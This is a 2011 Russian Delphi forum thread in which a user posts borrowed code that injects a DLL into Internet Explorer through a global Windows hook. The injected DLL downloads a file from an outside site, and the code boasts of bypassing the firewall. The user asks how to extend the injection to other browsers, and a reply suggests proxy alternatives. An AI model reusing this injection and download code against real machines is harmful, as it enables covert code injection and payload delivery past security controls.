|
DLL инжект - Вопросы и ответы, обсуждения - Ваши вопросы по Pascal/Delphi только в данном разделе |
14.12.2011, 17:38
|
#1
|
|
|
|
Разведчик
|
Регистрация: 16.10.2011
Сообщений: 9
Популярность: 92
Сказал(а) спасибо: 8
Поблагодарили 12 раз(а) в 8 сообщениях
|
DLL инжект
есть код с помощью которого происходит инжект в браузер (код не мой).
инжектится в IE (IExproler).
есть несколько вопросов:
1. как осуществить инжект в другой браузер (нужна проверка на открытые браузеры. если открыт какой либо из них то инжектится туда)??
пробовал в DLL изменить имя процесса ( менял iexproler.exe на opera.exe) в оперу не инжектится.
2. при инжекте в IE (Iexproler) открывается много окон браузера (не путайте с вкладками).
как это убрать ??
3. как открыть сайт в браузере в которой происходил инжект (через инжект).
вот приведен пример.
Код:
URLDownloadToFile(nil, 'путь в интернете к программе', 'd:\название', 0, nil);
эта функция скачивает с сайта программу (код из DLL)
мне нужно перейти на сайт а не скачивать программу. (именно через DLL/ библиотка UrlMon)
возможно такое??
-------------------------------------------
код DLL:
Код:
library hook_dll;
uses Windows, UrlMon;
var
_hook: HHOOK = 0;
thID: THandle;
function HookProc(nCode, wParam, lParam: integer): integer stdcall;
begin
Result:=CallNextHookEx(_hook, nCode, wParam, lParam);
end;
procedure SetHK(hk: HHOOK) stdcall;
begin
_hook:=hk;
end;
procedure WorkWithNet(thrVar: integer) stdcall;
begin
URLDownloadToFile(nil, 'http://do-prog.ucoz.ru/Project1.rar', 'd:\Gen_Sid.rar', 0, nil);
MessageBox(0, 'Успешно внедрились Internet Explorer и попробовали '+
'скачать файл в обход файрвола =)) Файл должен лежать в d:\',
'Hook DLL', MB_OK);
end;
procedure GetUrl; stdcall;
begin
URLOpenStream(nil, 'http://do-prog.ucoz.ru/',0, nil)
end; // пытался перейти на сайт- 0 эффекта
exports
HookProc name 'HookProc',
SetHK name 'SetHK',
GetUrl name 'GetURL';
begin
if GetModuleHandle(nil)=GetModuleHandle('iexplorer.exe') then
begin
CreateThread(nil, 0, @WorkWithNet, pointer(12345), 0, thID);
end;
end.
---------------------------
код проекта:
Код:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls;
type
TForm1 = class(TForm)
Button1: TButton;
Button2: TButton;
procedure Button1Click(Sender: TObject);
procedure Button2Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
Procedure GetURL; stdcall; external 'hook_dll.dll';
{$R *.dfm}
const DLL_INJ = 'DLL Injector (HOOKS)';
type TShp = procedure (hk: HHOOK) stdcall;
procedure InjectDLLviaHOOKS(dll_name: string);
var
h: THandle;
p: pointer;
sh: TShp;
hk: HHOOK;
begin
h:=LoadLibrary(PAnsiChar(dll_name));
if h=0 then
begin
MessageBox(0, PAnsiChar('Не могу загрузить DLL '+dll_name+'!'), DLL_INJ, MB_OK+MB_ICONERROR);
exit;
end;
p:=GetProcAddress(h, 'HookProc');
@sh:=GetProcAddress(h, 'SetHK');
if ((p=nil) or (@sh=nil)) then
begin
MessageBox(0, PAnsiChar('Библиотека '+
dll_name+' не содержит необходимых процедур!'),
DLL_INJ, MB_OK+MB_ICONERROR);
FreeLibrary(h);
exit;
end;
hk:=SetWindowsHookEx(WH_CALLWNDPROC, p, h, 0);
if hk=0 then
begin
MessageBox(0, PAnsiChar('Невозможно установить ловушку!'),
DLL_INJ, MB_OK+MB_ICONERROR);
FreeLibrary(h);
exit;
end;
sh(hk);
MessageBox(0, 'Ловушка установлена! Нажмите OK для снятия.',
DLL_INJ, MB_OK);
UnhookWindowsHookEx(hk);
FreeLibrary(h);
end;
procedure TForm1.Button1Click(Sender: TObject);
begin
InjectDLLviaHOOKS('hook_dll.dll');
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
GetURL;
end;
end.
Последний раз редактировалось *Хalyava*; 14.12.2011 в 17:42.
|
|
|
14.12.2011, 22:30
|
#2
|
|
|
|
Рыцарь-защитник
|
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
|
Re: DLL инжект
по моему этот код вообще тебе не поможет ибо он скачивает файл внутри дллки и нифиха не работает с браузером. может ошибся
З.Ы. и нафих тебе оно надо?
|
|
|
15.12.2011, 10:44
|
#3
|
|
|
|
Разведчик
|
Регистрация: 16.10.2011
Сообщений: 9
Популярность: 92
Сказал(а) спасибо: 8
Поблагодарили 12 раз(а) в 8 сообщениях
|
Re: DLL инжект
|
Цитата: |
|
|
|
|
|
|
|
|
|
по моему этот код вообще тебе не поможет ибо он скачивает файл внутри дллки и нифиха не работает с браузером. может ошибся
З.Ы. и нафих тебе оно надо?
|
|
|
|
|
|
если не получится сделать программу которую хотел то хотя бы разобраться с инжектом.))
надо же как то продвигаться в знаниях программирования))
сейчас как никак 21 век)) век компьютерных технологий)
|
|
|
22.12.2011, 22:46
|
#4
|
|
|
|
Рыцарь-защитник
|
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
|
Re: DLL инжект
|
|
|
23.12.2011, 08:40
|
#5
|
|
|
|
Разведчик
|
Регистрация: 16.10.2011
Сообщений: 9
Популярность: 92
Сказал(а) спасибо: 8
Поблагодарили 12 раз(а) в 8 сообщениях
|
Re: DLL инжект
|
Цитата: |
|
|
|
|
|
|
|
|
|
ты обьясни суть программы, пожет альтернативное решение скажу или помогу с инфой куда копать)
|
|
|
|
|
|
суть программы можно понять почитав тему которую я создавал перед этой
(Отправить пакет через TcpClient)
там я писал что мне надо отправить пакет не выходя из космоса в браузере.
как я понял кроме DLL инжекта и создания локального прокси (не уверен в этом) или написания LPS драйвера других вариантов быть не может)
|
|
|
25.12.2011, 01:50
|
#6
|
|
|
|
Рыцарь-защитник
|
Регистрация: 14.06.2010
Сообщений: 584
Популярность: 6626
Сказал(а) спасибо: 86
Поблагодарили 847 раз(а) в 266 сообщениях
|
Re: DLL инжект
ну вообще то lsp))) можно почитать rfc по socks5 и просто настраивать на него браузер, файра сама работает и у нее флеш плеер через плагин контейнер работает, но флеш, это подключаемый модуль, не факт что передача данных идет именно через окно браузера. у хрома например на каждое дополнение запускается chrome.exe процесс
|
|
|
26.12.2011, 14:00
|
#7
|
|
|
|
Разведчик
|
Регистрация: 16.10.2011
Сообщений: 9
Популярность: 92
Сказал(а) спасибо: 8
Поблагодарили 12 раз(а) в 8 сообщениях
|
Re: DLL инжект
|
|
|
Ваши права в разделе
|
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения
HTML код Выкл.
|
|
|
Похожие темы
|
Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
[Информация] инжект
|
Gm!Mr. luck |
Общение и обсуждение, архив Point Blank |
1 |
04.11.2011 08:23 |
Заявление об ответственности / Список мошенников
Часовой пояс GMT +4, время: 03:27.
|
|